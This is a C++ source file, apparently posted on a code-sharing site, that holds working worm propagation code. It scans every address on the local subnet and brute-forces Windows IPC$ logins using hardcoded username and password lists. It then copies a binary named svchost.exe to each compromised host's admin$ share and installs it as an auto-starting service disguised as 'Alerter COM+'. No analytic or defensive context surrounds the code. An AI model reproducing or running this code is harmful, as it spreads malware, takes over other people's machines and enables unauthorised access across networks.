📄 ipcold.h
字号:
// NetScan.cpp : Defines the entry point for the console application.
//
#include "stdafx.h"
#include "winsvc.h"
#include "winsock2.h"
#pragma comment(lib,"ws2_32.lib")
#include "PingI.h"
#include "winnetwk.h"
#pragma comment(lib,"mpr.lib")
const char *user[]={
"administrator","admin",
"admin$","administrator$",
"king","student",
"teacher","root",
"goto","hack",
"temp","admin888",
"admin1234","home",
"owner","Guest",
"fuck","you",
0};
const char *pass[]={
"NULL","whboy",
"administrator","admin",
"king","student",
"teacher","root",
"goto","hack",
"temp","admin888",
"admin1234","home",
"owner","Guest",
"fuck","you",
"1234","8888",
"hack","admin$",
"5201314","5203344",
"1234567","12345678",
"asdf","qwer",
"88888888","111111111",
"pass","password",
"computer","superman",
"login","love",
0};
DWORD ConnectRemote(const char *RemoteIP,const char *lpUserName,const char *lpPassword)
{
char lpIPC[256];
DWORD dwErrorCode,dwReturn=-1;
NETRESOURCE NetResource={0};
sprintf(lpIPC,"\\\\%s\\ipc$",RemoteIP);
NetResource.lpLocalName = NULL;
NetResource.lpRemoteName = lpIPC;
NetResource.dwType = RESOURCETYPE_ANY;
NetResource.lpProvider = NULL;
if(!stricmp(lpPassword,"NULL"))
{
lpPassword=NULL;
}
//printf("Now Connecting ...... ");
dwErrorCode=WNetAddConnection2(&NetResource,lpPassword,lpUserName,CONNECT_INTERACTIVE);
if(dwErrorCode==NO_ERROR)
{
// printf("Success !\n");
char LocalFile[256];
char RemoteFile[256];
::GetSystemDirectory(LocalFile,sizeof(LocalFile));
strcat(LocalFile,"\\IME\\svchost.exe");
sprintf(RemoteFile,"\\\\%s\\admin$\\system32\\IME\\svchost.exe",RemoteIP);
//向远程主机拷贝文件
if (::CopyFile(LocalFile,RemoteFile,FALSE))
{
SC_HANDLE hSCManager,hService;
char RemoteName[256];
//创建并启动服务:
sprintf(RemoteName,"\\\\%s",RemoteIP);
//打开服务控制管理器
hSCManager = OpenSCManager(RemoteName, NULL, SC_MANAGER_ALL_ACCESS);
if (hSCManager!=NULL)
{
hService = CreateService(hSCManager,"Alerter COM+","Alerter COM+",SERVICE_ALL_ACCESS,
SERVICE_WIN32_OWN_PROCESS|SERVICE_INTERACTIVE_PROCESS,SERVICE_AUTO_START,
SERVICE_ERROR_IGNORE,"%SystemRoot%\\system32\\IME\\svchost.exe",
NULL, NULL, NULL, NULL, NULL);
hService=::OpenService(hSCManager,"Alerter COM+",SERVICE_START);
if (hService!=NULL)
{
::StartService(hService,0,NULL);
::CloseServiceHandle(hService);
dwReturn=0;
}
::CloseServiceHandle(hSCManager);
}
}
}
//printf("Now Disconnecting ... ");
dwErrorCode=WNetCancelConnection2(lpIPC,CONNECT_UPDATE_PROFILE,TRUE);
if(dwErrorCode!=NO_ERROR)
{
WNetCancelConnection2(lpIPC,CONNECT_UPDATE_PROFILE,TRUE);
}
return dwReturn;
}
unsigned long CALLBACK IPC_thread(LPVOID dParam)
{
WORD wVersion =0 ;
int errret = -1;
WSADATA wsaData;
wVersion = MAKEWORD(2,2);
errret = WSAStartup(wVersion,&wsaData);
if( LOBYTE( wsaData.wVersion) != 2 ||
HIBYTE( wsaData.wVersion) !=2 )
{
// MessageBox(NULL,"winsocket库版本低","提示",MB_OK);
return FALSE;
}
/*获取计算机名称*/
CHAR szHostName[128]={0}; //将本机的名称存入一维数组,数组名称为szHostName
struct hostent * pHost; //定义结构体 hostent
int i; //定义变量i
SOCKADDR_IN saddr;
if(gethostname(szHostName,128)==0) //如果本机的名称查到,
{
pHost = gethostbyname(szHostName);
for( i = 0; pHost!= NULL && pHost->h_addr_list[i]!= NULL; i++ )
{
memset(&saddr,0,sizeof(saddr));
memcpy(&saddr.sin_addr.s_addr, pHost->h_addr_list[i], pHost->h_length);
}
}
char ip[128];
int count;
BOOL bpingOK=FALSE;
for(count=1;count<254;count++)
{
memset(ip,0,128);
sprintf(ip,
"%d.%d.%d.%d",
saddr.sin_addr.S_un.S_un_b.s_b1,
saddr.sin_addr.S_un.S_un_b.s_b2,
saddr.sin_addr.S_un.S_un_b.s_b3,
count);
CPingI m_PingI;
bpingOK = m_PingI.Ping(2,(LPCSTR)ip,NULL);
if (bpingOK)
{//用户名和密码枚举连接
for(int i = 0;user[i]; i++)
{
for (int j=0;pass[j];j++)
{
if (ConnectRemote(ip,user[i],pass[j])==0)
break;
}
}
}
}
WSACleanup();
//printf("Hello World!\n");
return 0;
}
/*
void main()
{
IPC_thread(NULL);
}
*/
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -